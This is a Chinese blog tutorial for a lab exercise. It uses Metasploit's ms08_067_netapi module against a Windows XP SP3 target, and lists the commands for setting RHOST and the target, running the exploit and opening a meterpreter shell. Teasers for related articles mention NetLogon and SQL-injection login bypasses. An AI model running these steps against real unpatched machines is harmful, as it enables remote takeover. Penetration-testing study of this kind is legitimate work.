Metasploit漏洞攻击(对XP进行攻击)

摘要:
它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制、编码器、无操作生成器和漏洞整合在一起,使MetasploitFramework成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新。
Metasploit漏洞攻击

Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。

实验:通过演示攻击Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)漏洞,掌握Metasploit的使用并进行漏洞攻击。 
工具:Metasploit Kali2. windows xp sp3
靶机 IP:192.168.20.16 攻击机:192.168.20.701.

1.在msfconsole使用search命令搜索MS08067漏洞攻击程序

Metasploit漏洞攻击(对XP进行攻击)第1张

Metasploit漏洞攻击(对XP进行攻击)第2张

从结果中得到

Name : exploit/windows/smb/ms08_067_netapi
Disclosure Date:2008-10-28
Rank:great
Description:MS08-067 Microsoft Server Service Relative Path Stack Corruption

2.使用use命令调用MS08067漏洞攻击程序

use exploit/windows/smb/ms08_067_netapi

Metasploit漏洞攻击(对XP进行攻击)第3张

3.使用show options 命令查看需要设置的选项

Metasploit漏洞攻击(对XP进行攻击)第4张

4.从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)

使用 set 命令设置 Module Options,此处需要设置目标IP
即 set RHOST 192.168.20.16

Metasploit漏洞攻击(对XP进行攻击)第5张

5.使用 set 命令设置后,可再使用show options 命令查看设置情况

Metasploit漏洞攻击(对XP进行攻击)第6张

6.使用check命令检查漏洞是否存在

Metasploit漏洞攻击(对XP进行攻击)第7张

7.设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞因为实例演示的XP系统为WinXP SP3 简体中文版,即

Metasploit漏洞攻击(对XP进行攻击)第8张

8.使用set target 命令设置目标,此处即为set target 34

Metasploit漏洞攻击(对XP进行攻击)第9张

9.执行exploit命令后得到一个meterpreter

Metasploit漏洞攻击(对XP进行攻击)第10张

10.在meterpreter中输入shell即可进入CMD窗口

Metasploit漏洞攻击(对XP进行攻击)第11张

漏洞利用完成。实验结束。

免责声明:文章转载自《Metasploit漏洞攻击(对XP进行攻击)》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇嫁给程序员的好处,你get到了吗?Servlet第三篇【request和response简介、response的常见应用】下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

CVE-2020-1472 NetLogon特权提升漏洞

漏洞名称:Netlogon特权提升漏洞 漏洞编号:CVE-2020-1472 漏洞描述:Netlogon协议认证的加密模块存在缺陷,当使用Netlogon远程协议建立与域控制器连接的易受攻击的Netlogon安全通道时,存在特权提升漏洞,导致攻击者可以在没有凭证的情况下通过认证。通过调用Netlogon中RPC函数NetrServerPasswordSet...

文件上传漏洞(绕过姿势)

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人...

Metasploit快速入门(二)

Metasploit快速入门(二) 参考: https://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652850556&idx=1&sn=bbfae36b3cbb012fc498ab3aa20501f3&chksm=bd5935b18a2ebca785209112971d...

'or'='or'经典漏洞原理分析

  'or'='or'漏洞是一个比较老的漏洞了,主要是出现在后台登录上,利用这个漏洞,我们可以不用输入密码就直接进入系统的后台。它出现的原因是在编程时逻辑上考虑不周,同时对单引号没有进行过滤,从而导致了漏洞的出现。先给大家简单介绍下漏洞的原理吧,只要大家搞懂了原理,就可以自己去找这样漏洞的系统了。 1:语句:''or'='or'    a'or'1=1...

Fuzzing FreeFloatFTPserver1.0与漏洞利用

Fuzzing FreeFloatFTPserver1.0与漏洞利用 目录 Fuzzing FreeFloatFTPserver1.0与漏洞利用目录☛ 1.漏洞介绍☛ 2.模糊测试,测试溢出☛ 3.模糊测试,寻找返回EIP位置☛ 4.模糊测试,测试EIP☛ 5.模糊测试,寻找payload启动地址☛ 6.寻找跳板指令并测试(使用系统为 xp sp3)☛...

网络安全开发包介绍

网络安全开发包介绍 引言:网络安全领域的许多网络安全技术,如防火墙、入侵检测、安全扫描、网络嗅探、协议分析、流量统计、网络管理、蜜罐等,其设计和实现都离不开一些网络安全操作,其中一些基本操作都在底层进行,使用频繁,如网络地址的操作、网络接口的操作、数据包的捕获、数据包的构造和发送、网络入侵检测等;还有一些比较复杂的操作,如流量的统计、路由的管理,ARP缓存...